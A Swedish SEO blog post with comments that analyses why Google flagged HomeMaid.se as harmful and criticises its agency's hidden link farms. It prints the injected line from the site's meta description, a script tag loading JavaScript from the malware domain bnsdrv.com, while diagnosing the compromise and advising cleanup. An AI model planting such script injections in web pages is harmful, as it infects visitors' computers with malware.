Google varnar inte längre från besök hos Homemaid.se
Postad av Nikke Lindqvist i Googleism, SEO-misstag, SökmotoroptimeringUppdatering 08-08-29: Google har nu, sedan HomeMaid städat (!) bort den skadliga koden från sajten plockat bort varningen för att besöka dem. Samtidigt har FireFox slutat varna för besök på sajten. Nu kan man återigen lugnt besöka www.HomeMaid.se utan att riskera att smittas av något elände. Rubriken är härmed ändrad.
Det är inte ofta man ser att Google varnar besökare för att besöka en webbplats, men när det händer, och dessutom händer ett bolag som är noterat på Stockholmsbörsen, då tycker jag att det är värt att notera. När det dessutom visar sig att företaget ifråga har anlitat ett SEO-företag som använder dolda länkfarmar på sina kunders sidor, ja då blir det faktiskt rent av en nyhet. Att sajten listas som farlig av Google kan i längden påverka, inte bara placeringarna för HomeMaid, utan även i förlängningen innebära problem för de sajter som länkar till dem.
Jag har gjort en del sökningar kring sökfraser som har med städfirmor och deras verksamhet att göra på sistone. Man kan lugnt säga att städbranschen inte är särskilt duktiga på synlighet i sökmotorerna. Det brukar i stort sett bara vara olika typer av söktjänster som visas på de termer som jag har använt samt en och annan tjänsteleverantör för offerering och budgivning. Ett och annat undantag finns - en och annan enstaka städfirma syns faktiskt i sökresultaten. Om än inte alltid på det sätt som man har väntat sig… Eller vad sägs om detta sökresultat som visas vid sökningar på frasen städning?
Nog för att man har hört talas om den smutsiga städbranschen, men det här tar ju nästan priset. Trygg städning i all ära - men det känns ju väldigt trist att sajten kan komma att skada min dator… Trots det klickar jag på länken och möts av följande interstitial, levererad av Google:
Det här börjar kännas läskigt, och innan jag vågar klicka mig vidare till www.Homemaid.se klickar jag på länken Safe Browsing-diagnostiksida. Klicka på den lilla bilden här till höger för en ögonblicksbild av hur det såg ut.
Sammanfattningsvis går det ut på att Google varnar för att sajten kan innehålla skript som kan komma att installera fulprogram (Googles term är faktiskt badware) på datorer som besöker den. Av 100 testade sidor innehöll fyra sidor programvara som kan skada datorer som besöker sajten. Senast Google hittade skadliga program på sajten var den 14 augusti, alltså för över en vecka sedan.
Of the 100 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 08/14/2008, and the last time suspicious content was found on this site was on 08/14/2008.
Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 3 new processes on the target machine.
Dels kan man tycka att det är smått skandalöst att ett svenskt börsnoterat företag har en sajt som innehåller denna typ av säkerhetshål, men det jag faktiskt främst förvånas över är att Google trots att man varnar besökarna, ändå listar sajten på förstasidan vid en sökning efter ordet städning på Google.se. En sådan position uppnår inte en sajt utan att göra en hel massa rätt på sajten eller utan att anlita någon som är bra på sökmotoroptimering.
Faktum är att Googles kvalitetsriktlinjer nämner just denna typ av problem som något man definitivt bör undvika, och om man utsätts för det, bör åtgärda så fort man bara kan.
Don’t create pages with malicious behavior, such as phishing or installing viruses, trojans, or other badware.
Hur kommer det sig då att Homemaid ändå syns i sökresultaten?
Fortfarande utan att klicka mig in till www.Homemaid.se tar jag mig en titt på vilka sajter som länkar till dem. Den bästa listan över länkar till sajten hittar man som vanligt via Yahoo Site Explorer. Naturligtvis innehåller listan mängder av den typen av länkar som alla börsnoterade bolag har. Det rör sig om länkar från aktieforum och aktiemäklare och från Stockholmsbörsen, men på plats 49 till 72 hittar man också det jag letar efter. En maffig länkkatalog, levererad av Argonova men placerat på sajter som t.ex. Aquababy.se:
Det verkar onekligen som om Homemaid har anlitat Argonova för sökmotoroptimeringen av sajten och som att Argonova har valt att lägga in dem i dolda länkfarmar från sina andra kunder sajter. Även denna typ av aktivitet är något som Google direkt avråder ifrån i sina kvalitetsriktlinjer:
Don’t participate in link schemes designed to increase your site’s ranking or PageRank. In particular, avoid links to web spammers or “bad neighborhoods” on the web, as your own ranking may be affected adversely by those links.
Nu tar jag mot till mig och går in och tittar på www.homemaid.se för att se varför i all världen Argonova har sett det nödvändigt att använda dolda länkkataloger för att få några länkar in till www.Homemaid.se. Det blir stopp direkt. Jag möts av den här bilden när jag försöker gå in på den med Firefox 3.01:
Här bestämmer jag mig för att först stänga av alla javascript, all hämtning av bilder och ställa in den högsta säkerhetsnivån och sedan öppna sajten i Safari istället. Där slipper jag igenom utan varningar.
Kan Homemaid.se placera sig på ordet städning av egen kraft?
Nej. Det första jag kan konstatera när jag, en smula nervöst och trevande tar mig in på sajten, är att www.Homemaid.se inte av egen kraft skulle placera sig i sökmotorerna på andra termer än företagsnamnet Homemaid.
Det märks visserligen att en sökmotorkonsult har varit inne och försökt styra upp situationen en smula. Längst ner på varje sida ligger en sidfot som innehåller orden flyttstädning, fönsterputsning, kontorsstädning, omvårdnad och städning. Det är rätt. Så skulle nog jag också göra. Men sedan är det faktiskt värre. Alla ord utom ordet städning är länkade till undersidor på sajten och länken städning går till sajtens förstasida, som har title-taggen “Homemaid erbjuder säker och trygg städning både kontor och hem.” I övrigt nämns bara ordet städning bara två gånger på sidan (varav den ena är länken i sidfoten).
Nästa steg blir att kontrollera description-texten på sidan. Först konstaterar jag att sajten, enligt språkvariabeln, påstår sig vara publicerad på engelska (vilket knappast hjälper till för sökningar efter svenska ord). Men i nästa sekund ser jag vad det är som har gjort att såväl Google som Firefox (och faktiskt även Yahoo) varnar oss för att besöka sajten. Description-texten ser ut så här:
<META NAME=”description” CONTENT=”HomeMaid är ett modernt tjänsteföretag som verkar för att skapa bättre livskvalitet för våra kunder. Vi erbjuder bland annat städning, städ, kontorsstädning, omvårdnad, fönsterputsning, flyttstäd, flyttstädning mm<script src=http://www.bnsdrv.com/ngg.js></script>”>
Sajten där skriptet som anropas ligger, bnsdrv.com, är bortplockad sedan en tid och går inte längre att nå. Exploiten har gjort att det har varnats för domänen sedan i mitten av juli. Det kan man lära sig mer om här:
http://www.malwaredomainlist.com/mdl.php?search=bnsdrv.com&colsearch=All&quantity=50
Googles varning mot domänen bnsdrv.com visar att den har använts för spridning av skadlig kod på åtminstone 326 sajter. Vem som egentligen ligger bakom domänen bnsdrv.com och vem som sedan har lyckats lägga in ett javascript hos HomeMaid.se och andra sajter vågar jag inte ha några tankar kring. Det troligaste är väl att sajten har blivit hackad och att bnsdrv.com också har blivit utsatt för ett angrepp av någon som har placerat det skadliga javascriptet där. (Helt parentetiskt är det rätt festligt att den tekniska kontakten för bnsdrv.com har en epost som tyder på att han bär det svenskklingande, men på grund av en hockeytokig webb, totalt osökbara namnet Markus Näslund.)
Vad kan de dolda länkarna innebära?
Argonova har helt uppenbarligen valt att ägna sig åt en smått antik metod för att bygga länkar till Homemaid.se. Tekniken går ut på att lägga upp länkfarmar hos sina kunder, som i sin tur länkar vidare till andra kunder, med de eftersträvade sökorden som länkad text. Ett exempel på hur det kan se ut hittar vi redan hos Argonova, som uppenbarligen lever som de lär:
http://www.argonova.se/info/fakta/partners/externt.php
Andra exempel på liknande sidor hittar vi på till exempel
- http://www.aquababy.se/nav13864_FA44FBA853F8479BA5DF500B76AE599C
- http://www.eyc.nu/externt.asp
- http://www.segers.se/externt.html
- http://www.tennab.se/externt.html
- http://www.bus4you.se/Public/External.aspx
Alla de ovanstående är SEO-kunder hos Argonova och det finns gott om liknande sidor. Några av dem kan man hitta genom att söka efter [argonova homemaid] vill man hitta fler kan man försöka efter [argonova webbyrå som arbetar med webbdesign] eller [länkpartners sökmotoroptimering] (då man även hittar en och annan kund hos göteborgsföretaget SEOdesign). Länkfarmar av den här typen har ingen stor effekt hos Google och har blivit alltmer omoderna efter att Altus gjorde sådan skandal med tekniken för några år sedan - men just det här fallet visar att de trots allt kan ha viss effekt fortfarande. Ändå är det en smula förvånande att Argonova fortfarande ägnar sig åt dolda länkfarmar - det brukar sällan vara populärt hos kunderna när det upptäcker att de har denna typ av länkfarmar på sina sajter. Förutom Argonova är det väl i stort sett bara göteborgsföretaget SEOdesign som sysslar med detta idag.
Jag skulle inte frivilligt länka till HomeMaid.se just nu
I just det här fallet kan det dessutom visa sig vara direkt skadligt att ha länkar till HomeMaid. Google brukar inte direkt premiera sidor som länkar till sajter som sprider skadlig kod. Faktum är att en omläsning av ovan citerade punkt ur Googles kvalitetsriktlinjer är på sin plats:
Don’t participate in link schemes designed to increase your site’s ranking or PageRank. In particular, avoid links to web spammers or “bad neighborhoods” on the web, as your own ranking may be affected adversely by those links.
[Min kursivering.]
I och med att HomeMaid.se har listats som potentiellt skadlig enär sajten (om än motvilligt) har bidragit till att sprida skadlig kod så har den blivit vad Google brukar referera till som ett bad neighborhood - ett dåligt område - på webben. Dåliga områden länkar man inte till om man inte vill utsätta sig för eventuella repressalier i form av sämre sökmotorplaceringar.
Kontentan av det hela är alltså att Argonova inte bara har utsatt HomeMaid för en viss risk när man har skaffat länkar till sajten från dolda länkarmar hos andra kunder. Man har även utsatt dessa kunder för en risk i och med att dessa har länkat till en sajt som Google har identifierat som ett dåligt område på webben.
Råd för skadebekämpning
Vad kan HomeMaid göra? HomeMaid bör så fort som möjligt se till att gå igenom alla sidor på sin sajt och plocka leta efter instanser där javascript inkluderar kod från andra sajter. (Börja med de fyra sidor som Google listar här.) Dessutom bör man se över sin säkerhet kring webbplatsen, byta alla lösenord och gå igenom sina serverloggar för att ta reda på hur och när detta javascript kan ha placerats i meta description-taggen på sajtens förstasida. (När man ändå håller på bör man nog titta på hur dotterföretaget Fixelina och sajten fixelina.se ser ut - som den hanteras just nu försämrar den bara sökresultaten för bägge domänerna.) Så fort detta är gjort bör man kontakta Google (gärna via sitt webmastertools-konto) och meddela att man har fått bort all skadlig kod från sajten. I nästa steg borde man nog ta ett ordentligt grepp kring sin onpage-optimering. Med den mängd länkar som finns till den borde man klara sig bättre i sökmotorerna utan att behöva ta till fulmetoder som länkfarmar.
Vad kan Argonova göra? Argonova bör nog fortast möjligt se till att plocka bort HomeMaid.se från sina övriga kunders länksidor. Klokast vore det nog att se till att länksidorna försvinner helt och hållet.
Vad kan Argonovas andra kunder göra? Argonovas övriga kunder bör nog titta efter om de har dolda länksidor som länkar till HomeMaid på sin sajt. Enklast sker det genom att skriva in en sökning som t.ex. [site:www.domän.se homemaid], [site:www.domän.se sökmotoroptimering] eller [site:www.domän.se länkpartner] i sökrutan hos Google (byt ut domän.se mot er egen domän).
Vad kan vi andra göra? Vi kan ta lärdom, se över säkerheten kring webbplatsen, titta igenom vilka länkar som finns på våra egna sajter (till exempel med hjälp av Live.com och kommandot +linkfromdomain:homemaid.se där ni byter ut homemaid.se mot er egen domän (och nej, ni behöver inte titta - HomeMaid.se har inga dolda länkfarmar på sajten vad jag kan se). Vi kan börja använda Firefox som så snällt varnar oss mot att besöka sajter som innehåller skadlig kod men i övrigt kan vi mest ägna oss åt att kläcka skämt kring den tidvis smutsiga städbranschen och den mestadels smutsiga SEO-branschen.
Inlägg (RSS)
Jag får likadan varning från FF när jag försökte besöka WWFs sidor för “Pandaförsäljningen”. Skärmdump finns på: http://farm4.static.flickr.com/3223/2791246705_6ec046c00c_o.jpg
Ja, det var smaskigt, bra jobbat!
Bra jobbat, du borde skapa en blacklist över svenska SEO-företag med underliga metoder, och självklart en whitelist för de som sköter sig också!
Jo du Niklas… tanken har väl slagit mig, men vi ska inte glömma att även de mest okoscher metoder faktiskt fungerar för en tid och att svarthattarna ibland kan åstadkomma resultat för sajter som borde vara hopplösa fall.
För mig, och för många företag som tycker att det är viktigt med en alltigenom seriös framtoning, gäller det framför allt att inte göra någonting som man inte skulle känna sig bekväm i att berätta för kunden eller för en konkurrent. För andra är det enbart de kortsiktiga resultaten som gäller - helst förenat med en så lönsam ekonomisk modell som möjligt.
Trevligt med lite grävande journalistik i den här bloggen igen. Har saknat det ett tag.
Klura: Om man tittar på vem som äger Pandaförsäljningen så framgår det rätt tydligt att det inte är WWF som äger domänen utan ett aktiebolag: Pandaförsäljningen AB i Karlstad. Detta AB ägs, enligt allabolag.se av Bonnier Books AB, och sajten verkar vara ännu mer infekterad än Homemaid. Tittar folk över huvud taget inte till sina sajter under somrarna?
Hahaha, ja den var kul! Heheh, kruxelikrux skulla man kunna säga om det hela! (sorry kan ses som en långsökt kommentar, men den som söker skola finna).
Jupp. Kruxelikrux på dig du Magnus :-)
Här är förresten en bra länk att läsa om man har blivit drabbad av Badware på sin sajt:
http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html
Härligt att ha dig tillbaka Nikke i storslagen form :). Fast mest tycker jag detta är tråkigt. Homemaid skulle kunna ha topplaceringar utan BadWare bara genom att jobba etiskt…
Eller hur Simon!?!?! När man tittar på vilka sanslösa kvalitetslänkar de har i övrigt skulle det inte vara några som helst problem för sajten att klara sig utan länkkataloger.
Härlig genomgång! Man kan inte annat än förvånas över en del saker - som detta till exempel…
Med Peters genomgång nyligen på WN/Jaiku så undrar man när nästa riktigt storslagna skandal kommer upp till ytan och ruskar om SEO-branschen i dess grundvalar. Frågan är ju knappast om utan när…
Ser med intresse fram emot den öppnare Nikke som kommer tillbaks igen ;-)
aahahhaa…. Inte bra, inte alls bra. För Homemaid alltså.
Men visst var det kruxelikruxelikrux :)
Kanske skulle det behövas ett “städföretag” i SEO branschen :)
Jobbigt när man inte längre kan lite på SEO konsulter man anlitat. Vad ska man göra då om man inte kan mycket om SEO…
Bra jobbet Nikke.
Meget interessant artikkel. Søk på “städning” gir 17.plass på Google men men forundrer meg at siten ikke er utestengt siden dette er en manuell vurdering av Googles spam team. Vi får håpe siten er utestengt ved neste oppdatering av indeksen. Jeg kommer til å referer denne casen og artikkelen i mitt åpne heldags SEO kurs :-)
Man ska lyssna och lära sig tycker jag. Det lönar sig alltid att öka den interna kompetensen inom företaget för dessa frågor.
Man anlitar konsulter som lär ut metodiken och tar hjälp vid upphandling av direkta tjänster. C&S Bygg, som signaturen lagerhall länkar till är ett exempel på ett företag som just nu satsar stort på att skaffa länkar via bloggar som, liksom den här, släpper igenom verkliga länkar på de flesta bloggkomentarer. Dock har de blivit så flitiga i sitt kommenterande med signaturer som “Byggfirma”, “gjuta”, “betong”, “bygga”, “renovera” och just denna, “lagerhall”, att man börjar dra uppmärksamheten till sig…
[...] bloggämne är internetsäkerhet och jag börjar med att uppmärksamma att Nikke Lindqvist igår skrev om hur webbplatsen för det börsnoterade företaget Homemaid enligt Google kan vara en [...]
Intressant läsning som jag inledde mitt senaste inlägg med att referera till. Jag utvecklade det lite utifrån mina erfarenheter av leverantörer för nyhetsbrev och fick också upp den där fina bilden i Firefox.
Kan du inte göra det till en affärsverksamhet då? Ta betalt för etisk granskning av seo-företag och utfärda certifikat på
årsbasis.
Tror det finns ett stort behov hos seriösa företag att ta avstånd från de med mer tveksamma företagen. För detta krävs det en oberoende aktör med kunskap om både SEO och branschen i sig (Nikke) som kan granska.
Lite som svanenmärkt, fast Nikkemärkt kanske =)
[...] Missa inte Nikke Lindqvists undersökning av en varning i Google som mynnar ut i en härva av dolda [...]
“Approved SEO by Nikke” ;-)
Hej
Intressant läsning. Jag har dock en fråga: Blandar du inte lite ihop deras SEO-metoder med det faktum att dom råkat fått badware installerat? Dessa två behöver inte alls ha med varandra att göra.
Ja och nej Björn. Texten behandlar bägge dessa aspekter som egentligen inte har med varandra att göra.
Just i det här exemplet tycker jag dock att de har rätt stor relevans för varandra. Sajterna som (vetande eller ovetande) länkar till sajter där Google varnar för badware råkar ju, i och med länkarna, i dåligt sällskap så att säga.
Jag tycker det är ett klockrent exempel på varför man inte ska tillåta tredje part att lägga in länkar på ens webbplats.
“Jag tycker det är ett klockrent exempel på varför man inte ska tillåta tredje part att lägga in länkar på ens webbplats.”
Men det resonemanget baseras ju på att det är SEO-bolaget som placerat badware på siten.
Jag ska inte krångla, men jag är inte övertygad. :)
Nej hoppsan. Så menar jag faktiskt verkligen inte.
Jag påstår absolut inte att Argonova skulle vara ansvariga för att ha lagt dit någon fulkod. Det har snarare skett genom dåliga säkerhetsrutiner på servern som hostar HomeMaids sajt.
Det jag menar är att till exempel aquababy.se som är en av de sajter som har länkar till HomeMaid faktiskt kan drabbas av en negativ effekt för sin sajt i och med att de länkar till en sajt som innehåller badware. Därför är det dåligt för Aquababy.se att ha länkfarmar på sajten som länkar till HomeMaids sajt. Därför blir det här ett klockrent exempel på att det är dåligt att finnas med i länkbytesprogram där man inte vet vilka sajter som man kan komma att länka till på sajten.
Ser nu att varningen för Pandaförsäljningen, som nämns i någon av de första kommentarerna, nu har försvunnit från såväl Google som Firefox. Det finns hopp med andra ord.
Tänkte bara tillägga att HomeMaid är informerade om hur deras sajt visar upp sig i sökmotorerna och att jag har skrivit den här texten.
Idag ser jag att fulkoden är borta ur description-texten och jag väntar nu på att Google ska sluta varna för sajten.
[...] länkfarmar” något som Google hatar. Varning utfärdas härmed! Du kan läsa en fördjupning här. Inga kommentarer än så länge Kommentera RSS för kommentarer till det här inlägget. [...]
[...] Det är enkelt att se vilka webbplatser som länkar till en webbplats/domän. Skriv bara link:www.dindomän.se i sökrutan på Google.se. Läs vad som hände det börsnoterade företaget HomeMaid, http://www.lindqvist.com/b/google-varnar-for-homemaid [...]
[...] gurun Nikke har en bra artikel om oetisk sökmotoroptimering och även hur ett företags sökresultat i Google kan vara en katastrof om man inte ser [...]